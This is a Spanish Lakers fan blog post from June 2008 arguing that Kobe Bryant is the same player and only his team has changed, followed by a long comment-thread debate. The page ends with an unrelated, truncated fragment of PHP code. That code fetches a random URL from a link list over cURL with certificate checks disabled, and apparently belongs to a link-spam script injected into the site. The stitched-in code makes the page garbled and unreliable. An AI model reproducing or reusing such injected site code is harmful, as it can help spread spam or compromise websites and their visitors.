Diario laker: La metamorfosis

05 de June de 2008 por MagicJohnson32

Pensamientos desde el 1.111 de South Figueroa Street, antiguo 3.900 de West Manchester Boulevard.

Iba a empezar el Diario laker de hoy diciendo que es día de partido. Pero creo que me quedaría corto, que la ocasión requiere algo más contundente, más expresivo, más acorde a lo que la ocasión merece: desde el 14 de junio de 1987, y ha llovido desde entonces, no asistíamos a un Lakers-Celtics en las finales de la NBA. Estos duelos, que elevaron la liga y el baloncesto a lo que ahora mismo es, que nos engancharon para siempre a este deporte y (a algunos) a estos equipos, no han perdido un ápice de su atractivo, de su capacidad para generar expectación, de su naturaleza casi hipnótica.

Lakers y Celtics han vuelto, y nosotros celebramos que sus regresos se hayan producido a la vez.

Independientemente del partido de esta noche, del inicio de las Finales, había un tema que llevaba un tiempo queriendo comentar. Leo, lo he leído en los últimos meses y más aún en las últimas semanas, que Kobe Bryant no es el mismo.

kobearmsQue ahora sonríe, que se divierte con sus compañeros, que los invita a cenar y les regala relojes de oro, que obedece a su entrenador, que es más generoso en su juego, que realmente disfruta con lo que hace. Por lo visto, antes no hacía nada de eso. Antes era huraño, egoísta y amargado. Derrumbó el equipo del Three-peat, echó a O’Neal, a Phil Jackson, a Karl Malone, y posiblemente estuviese detrás de la traumática marcha de Samaki Walker. Antes gritaba a sus compañeros cuando éstos fallaban; ahora les da cariñosas palmaditas en la espalda. Antes llevaba el 8; ahora viste el 24. Antes pedía el traspaso; ahora lleva su equipo hasta las Finales.

Como la metamorfosis que sufre Gregor Samsa, pero a la inversa. El patito feo de Colorado ya es el cisne de Hollywood: Nike ya le ha hecho una línea de ropa exclusiva, la NBA lo mete en todos sus vídeos promocionales, su camiseta es un top-seller mundial y hasta los periodistas se atreven a elegirlo por primera vez MVP de la temporada. Lo que no sabemos es la causa de esta transformación (aunque la prensa deportiva española diría, faltaría más, que el mérito es de Gasol).

koberonnyLo cierto es que Bryant… no ha cambiado. Sigue siendo el mismo jugador, el mismo depredador de siempre, el mismo tiburón que se lanza a la yugular en cuanto huele la sangre, el mismo competidor extremo que exige a sus compañeros un nivel de intensidad equivalente. ¿Se ríe más que antes? Es lo que pasa cuando compartes vestuario con Ronny Turiaf y cuando tu equipo, que partía como un simple aspirante a una plaza de Playoffs, se convierte en serio candidato al Anillo. A mí, desde luego, me daría la risa. ¿Es más generoso? Bryant sigue alrededor del promedio de asistencias que mantiene desde la temporada 99-00, nunca inferior a las 5 y nunca superior a las 6 por partido. ¿Ahora lanza menos? Tal vez, sólo tal vez, tenga que ver el hecho de que ahora cuente con Derek Fisher y Pau Gasol donde antes estaban Smush Parker y Kwame Brown.

Quien piense que Bryant ha jugado los últimos años para lucirse, para incrementar su promedio anotador, para being-like-Mike, entonces sí, pensará que éste no es el mismo Bryant. Los que pensamos que el #24 siempre ha jugado para ganar, y que ha lanzado más o menos en función de las circunstancias, opinamoskobeclutchsuns diferente. Esto no quita para que estemos disfrutando más que nunca de su juego, pero esto es, básicamente, porque el rendimiento general del equipo es magnífico y esto le permite acaparar menos responsabilidad ofensiva. En realidad, ya vimos una versión muy similar de este Bryant en los tiempos del three-peat (comparad sus estadísticas de la 00-01 con las de este año, por ejemplo). Cuando ha sido posible, Kobe ha reducido considerablemente su cifra de lanzamientos y se ha centrado en su papel de líder (esencial en un equipo tan joven) y en aquello que sabe hacer mejor que nadie y que es lo más admirable: elegir el momento en el que elevar su juego, en el que meter la canasta que rompe la racha del rival, la que silencia a todo un pabellón en los partidos como visitante o enciende al público del Staples y le hace creer en que remontadas como las dos protagonizadas ante los Spurs son posibles. Él las hace posibles, como hizo posibles tantas otras remontadas en temporadas anteriores.

Se trata, por tanto, del mismo jugador en distintas circunstancias. Y esta noche, a partir de las 3:00, tendremos más pruebas que nos confirmarán de qué jugador estamos hablando.

lakerteam

Comenta

12 comentarios a esta entrada

  1. Gallis dice:
    #1

    Uffff, esto va a ser divertido…y no me refiero a la final, juas, juas…

      Citar

  2. MagicJohnson32 dice:
    #2

    Sí, bueno, me da la impresión de que va contra la opinión generalizada. Pero yo es que veo cambios en el equipo, no en Kobe.

    Y tú… ¿qué? ¿no te mojas?

      Citar

  3. Gallis dice:
    #3

    Que no me mojo, dice el cachondo, juas, juas, juas…¿te tengo que recordar quién es más kobista de los 2? 😛

    A ver, socio, se trata de economizar fuerzas. Como sabes(lo hemos defendido durante años) estoy totalmente de acuerdo con lo que has escrito, pero soy de los pocos…mejor me espero a que 3 ó 4 defiendan lo contrario (con >>>>>>> y todo,jeje) y luego ya si eso empezamos el debate…aunque te reconozco que cada vez me interesa menos, porque haga lo que haga en la pista(o digamos lo que digamos), hay ciertos San Benitos que ya no se los quitará nadie jamás de los jamases…

    Yo siempre he pensado que Kobe era el tipo de jugador que ahora muchos parecen haber descubierto…y en cuanto ha tenido equipo, aquí estamos, de nuevo en las finales…

    A poooooooor eeeeeeeeellllllllloooooooooossssssssssssssss!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!

      Citar

  4. MagicJohnson32 dice:
    #4

    Es que me apetecía leerlo hoy, juas juas. Pues eso. Y lo cierto es que tampoco es un tema que me preocupe; ya llevo unas temporadas diciendo lo de “pa qué queremos el MVP cuando tenemos al mejor jugador”. Sólo ha hecho falta un equipo en condiciones para tener ambas cosas.

    Ya sólo faltan 9 horas y media. Virgen santa, estoy atacao.

      Citar

  5. TheDeerHunter dice:
    #5

    Opino que el cambio en Kobe es indiscutible, Magic, más allá de los números y de las sonrisas.

    ¿el equipo?? pues sí, ha cambiado ¿a mejor comparado con los que se hicieron alrededor de Shaq??? lo siento pero yo no me atrevería siquiera a insinuarlo. Mucho tendría (mejor dicho, tendrá) que demostrar este equipo para llegarles a la suela de los zapatos.

    El problema de Kobe no ha sido que le pegue un grito a un compañero cuando fallaba. Yo nunca he visto gritos más escalofriantes que los de Jordan y (casi) todo el mundo le adora… Su problema fue que siempre llevó su causa particular más allá de todo lo razonable.
    Era capaz de chulearle a Jordan de mala manera en todo un partido de las estrellas, de cuestionar el liderazgo de Shaq y ponerse en contra de todo el equipo campeón sólo porque quería tener más protagonismo, de pelearse con la prensa y decidir un día tirarse hasta las zapatillas porque algún fulano había dicho que no era un buen tirador y otro día no tirar ni un sólo tiro (literalmente) porque otro había dicho que era un chupón… un día se cargaba el equipo a las espaldas y se pegaba él sólo contra el mundo para ganar un miserable partido de la regular y al siguiente bajaba los brazos y pasaba de todo tirando por tierra toda una eliminatoria de playoffs…
    En demasiadas ocasiones se ha mostrado públicamente como un niño mimado, como un creído, como un inadaptado, un inmaduro, a veces un payaso… supongo que todo ha sido fruto de lo joven que llegó a la liga y de su cultura un tanto nómada (como decía aquel artículo de los EuroLakers) y luego está su estilo de juego más orientado a lo individual y aquel turbio asunto…

    Se le ve diferente. Más tranquilo, menos obsesionado por su propio trozo del pastel, más centrado en lo importante y menos en lo superfluo. Más maduro, más integrado, más persona… y su juego también es menos forzado, aunque aquí te doy la razón de que también tiene unos mimbres distintos para ello.

    Creo que Kobe ha vencido la campaña contra si mismo. Se ha dado cuenta que lo que él quería, que era ser el más grande de todos, que era ser el único victorioso de su batalla contra el mundo, era más difícil de lo que pensaba en un principio. Se ha dado cuenta que hasta los más grandes basaron su leyenda en sus compañeros y que uno sólo únicamente podrá batir récords y poco más, pero nadie ha podido llegar a ser un verdadero campeón sin ayuda de otros grandes jugadores… y a veces ni con esas.

    Yo no sé si Kobe saldrá victorioso de ésta… está la cosa difícil.
    Lo que sí sé es que independientemente del anillo, hay un mundo de jugador entre el Kobe de hoy y el Kobe del 2004, por poner un ejemplo…

    y ya que estamos… he podido disfrutar en directo (me refiero por la TV) de la gran mayoría de los más grandes de entre los grandes… desde el Dr. J, pasando por Kareem, Magic y aquellos Celtics de Bird, los Bad Boys, siguiendo por Jordan y sus Bulls y terminando por Olajuwon, Shaq y Duncan… El top 5 de la historia del baloncesto si no tenemos en cuenta a Russell y Chamberlain.
    Pues opino que el Kobe que he visto este año y estos playoffs NO TIENE NADA QUE ENVIDIAR A NINGUNO DE ELLOS. (bueno sí, el anillo de momento…)

      Citar

  6. TheDeerHunter dice:
    #6

    por cierto… tengo que sobar un rato antes del partido, sino mañana voy a flipar en colors… ¿vosotros creeis que voy a poder???

      Citar

  7. Olafur dice:
    #7

    Deer firmo punto por punto pero mejor que lo digas tu jeje, vamos el Kobe del 2004 de los 4 fantásticos y del repasito de Pistons no tiene mucho que ver con el de ahora.

      Citar

  8. Viva_Dirk dice:
    #8

    Yo lo que siempre digo, y eso que creo que Magic y Gallis tienen mas parte de razón que Deer y Olafur, es que cuando leo una crónica de una victoria de los Lakers que ha hecho Magic, el factor decisivo ha sido Kobe, sin embargo leo la crónica de una derrota y resulta que a Odom le falta caracter, o que Fisher no metió una o que Pau no estuvo intenso, NUNCA leo que el factor mas influyente para perder halla sido Kobe.

      Citar

  9. Gallis dice:
    #9

    Yo a veces alucino un poco, pero bueno, enseguida recuerdo tiempos pasados y me doy cuenta de que esto siempre ha sido y será así. No me refiero a Kobe, sino a la imagen que se tiene de los jugadores.

    Eso de que Kobe ha dado imagen publica de niño mimado, payaso, etc,etc, es cuando menos, una realidad sesgada. La imagen publica que uno da no depende de uno, depende de los medios…y claro, todos recordamos su pelea con Reggie Miller, sus enfretamientos con sus compañeros(con Shaq, vaya, porque los 3 tipos más inteligentes de ese vestuario, Fish, Harper y Shaw son grandes amigos suyos), su puñetazo a Samaki Walker, su petición de traspaso. Un jugador muy discolo, vaya, con esa imagen que tu apuntas porque en cuanto abre la boca, está en portada de ESPN…solo que claro, ayer en el campo había al menos 3 jugadores con el mismo currículo, Kobe, Garnett y Pierce. Es más, los 2 primeros no se han de ningún campo escupiendo al banquillo rival…pero por cada página escrita sobre Pierce y Garnett se escriben cientos sobre Kobe. Es lógico, es el precio de ser el mejor, pero creo que es nuestro trabajo no pensar como nos quieren hacer pensar y tener un criterio propio, basado en la perspectiva general y no en la parte que los medios(de los cuales formo parte y se lo que me digo) nos quieren mostrar…pero vaya, que el tiempo lo cura todo y no te quepa duda de que dentro de 15 años, cuando se haya retirado será recordado como un grande, sin esos adjetivos peyorativos tan injustos que ahora le acompañan. Y lo creo porque es lo que pasa siempre. Si no pasara, Magic sería recordado como el niñato que no se hablaba con Kareem, que al poco de llegar exigió echar a su entrenador y al base titular del equipo o ser traspasado y que le ponía los cuernos a su mujer casi a diario…y así con Jordan, Thomas, Karl Malone, etc, etc, jugadores que tuvieron la suerte de vivir en una época en la que Internet no existía y los medios no te “diseñaban” imagenes públicas…¿dices qué está ganando la batalla? Creo que mejor aún, en eso si ha cambiado…ha dejado de luchar, porque los molinos de viento no se pueden derrumbar y a esttas alturas hay gente (afortunadamentte cada vez menos), que no está dispuesta a admitir que esa bonita película que se han montado no es cierta…

    Eso en el aspecto personal. En cuanto a lo deportivo que apuntas, es como todo. A mi alguien me tiene que explicar todavía como es posible que el mismo entrenador que dejo en el banquillo a Pippen en la última jugada de un partido de Playoff porque protestó por que el último tiro era para Kukoc y no para él, no sienta a Kobe cuando hace las barbbaridades que alguno decís que ha llegado a hacer. Y luego está lo que hablo de la perspectiva. Todos nos acordamos de aquel partido en Sacramento en el que solo hizo 3 ó 4 tiros, o aquella segunda parte del séptimo contra los Suns en la que no tiró…y claro, se supone que lo hizo para demostrarle a no se quién de la prensa no se qué…y todos le señalamos con el dedo. Pero resulta que hace menos de un mes, no recuerdo si contra los Spurs o contra los Jazz, anotó 2 puntos en los primeros 24 minutos, tirando solo 2 veces(en un partido de PO´s!!!) y nos pareció que hizo un partido soberbio…la diferencia la apunta mi socio, ahora tiene un equipo, antes no…

    Yo puedo admitir(de hecho así lo pienso) que el Kobe del 98, el de los airballs en Utah si era el Kobe del que hablais, pero desde la llegada de Phil Jackson sufrió una transformación y desde entonces es el mismo. Lo que cambian son las circunstancias, pero él siempre ha seguido la misma tónica, hacer lo posible y lo imposible para ganar. En 2003, cuando Shaq se perdió los primeros 15 partidos de la liga, Jackson dijo publicamente que necesitaba que Kobe ejerciera de base…y Kobe promedió en diciembre 10 asistencias por partido. Un par de meses más tarde Jackson dijo que hasta que Shaq recuperara la forma, su único medio de ganar era a través de la anotación de Kobe…y Kobe acabó febrero promediando 40 puntos por partido. Y así hay muchisimos ejemplos de Kobe haciendo exactamente lo que le pide el entrenador…

    El Kobe de los Pistons de 2004 es este mismo Kobe, solo que en otro equipo y encima, jugando mal, pero es el mismo. El peor porcentaje de aquella final fue en el cuarto partido(creo), cuando hizo 8 de 25. Anoche hizo 9 de 26. ¿Porqué? Por que jugó mal entonces y jugó mal anoche, pero es el mismo jugador. Lógicamente todos maduramos con el tiempo y no somos los mismos que hace 4 años, pero creo que se me entiende. Cuando digo que es el mismo, quiero decir que su manera de entender el baloncesto no ha cambiado…lo único que ha cambiado es que ahora por fin vuelve a tener quién le acompañe…

      Citar

  10. TheDeerHunter dice:
    #10

    Gallis, no te engañes…
    a Magic se le recuerdan esas cosas y se le recordarán siempre. Y de los demás lo mismo… mira el amigo Isiah la cantidad de asquerosos sambenitos que se le recuerdan (muchos de ellos sin demostrar, por cierto)

    Y Kobe no es el primer centro del universo que existe en estos tiempos de las comunicaciones. Antes que él lo han sido otros y no se han comportado como él (o alguno igual peor)
    A Kobe, le recordaremos como lo que es y lo que ha sido… y le recordaremos por sus virtudes y por sus defectos… y los medios no se inventan tanto como pretendes decir. De donde no hay no se puede sacar… y Kobe les ha dado noticias para parar un tren. Él solito, no le quites méritos…. y no es ninguna víctima, macho (los molinos de vientorll??? pero ¿ande vas???) que tú, yo y más de uno igual le cambiabamos la película.
    Defender a Kobe no significa negar la evidencia.

    Insistí en que más allá de los números a Kobe se le ve diferente. A mí nadie me puede decir que es el mismo que el de Detroit, porque lo veo muy distinto por distintos motivos (algunos que ya he dicho) Si tú lo ves igual me parece perfecto y respetable… no seré yo quien te lo eche en cara. (aunque veo algo raruno tu argumentación al respecto 😉 )

    Por cierto, lo de la historia de Pippen, cada uno la cuenta de diferente manera y dudo mucho que alguna de las versiones sea exacta.

      Citar

  11. Gallis dice:
    #11

    A ver, a ver. Claro que de Magic se recuerdan esas cosas. Joder, o tienes amnesia selectiva o es normal…pero a lo que me refiero es que no se le dan ninguna importancia. Ahora solo importa la leyenda, pero cuando era jugador se hablaba, y mucho, de la persona…y no siempre para bien. Y de Thomas se siguen diciendo cosas, pero porque sigue en el candelero…

    Por supuesto que Kobe no es el primer centro del universo mediatico…que yo sepa, nunca he dicho que sea el único con el que la prensa haya sido injusta. Es más, es la especialidad de la casa. Y releete lo que he escrito y dime cuando he dicho que la prensa se haya inventado algo…lo único que he dicho es que hay muchos jugadores que tienen los mismos pecados y que si la única razón para sobredimensionar los de Kobe es que es el mejor, pues allá cada uno…cuando hablo de los molinos de viento me refiero a eso, que ya ha aceptado que hablen de él, aunque sea mal…y claro que yo le cambiaba la película, no te jode, pero esto está un poco fuera de lugar…es, para que me entiendas, como lo de wind y el maltrato angelino. No tiene nada que ver una cosa con la otra. Que a mi me parece injusto el trato que se le da no quiere decir que yo no estaría encantado con estar en su lugar…vamos, estaría encantado con estar en el de Vujacic, así que ni te cuento. Lo que para tí es negar la evidencia para mí es ver todo el conjunto…

    Y no creo haberte echado en cara nada. Pero si pienso que el Kobe de 2004 es el mismo que el de ahora podré decirlo, no. No sé que ves de raro en mi argumentación, pero bueno, tú mismo.

    Y yo sobre la historia de Pippen he oído la misma versión de varios de los implicados, pero vaya, que no estaba allí…en cualquier caso sigo pensando que Jackson no es el típico entrenador que aguantaría a un estrella, por muy buena que fuera, que no haga lo que le pide.

      Citar

  12. TheDeerHunter dice:
    #12

    Gallis… empezamos a desvariar sobre este tema…

    Yo creo que ya las posturas están claras… a mí hay cosas de Kobe que me han parecido feas y/o me han molestado en mayor o menor medida a lo largo de su carrera.
    Como jugador me parece, obviamente, superlativo… pero lo considero levemente inferior a alguno de los grandes precísamente por pequeños detalles de su personalidad, que le lleva a hacer cosas, por ejemplo, como lo de los dos partidos de esta final en los que se la ido un pelín la pinza. (ojo, que a mí, como dices, se me hubiera ido de mucha peor manera) Esos detalles han generado una cierta animadversión de los aficionados y los medios que yo veo normal… y tú consideras injusta.
    En cualquier caso este año lo veo mucho más maduro y más implicado con su entorno (aunque es cierto que así ya lo he ido viendo estos últimos años y cada vez más mejorado, algo que me parece evidente)
    Sobre lo último que comentas de Jackson opino que es uno de los entrenadores con mayor mano izquierda que he visto y eso en cierto modo también ha encauzado las idas de hoya de “l’enfant terrible” como antes ya sucedió con otros.

    Tú ya has descrito tu opinión de Kobe… y me parece completamente respetable. Poco más se puede sacar de este debate.

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>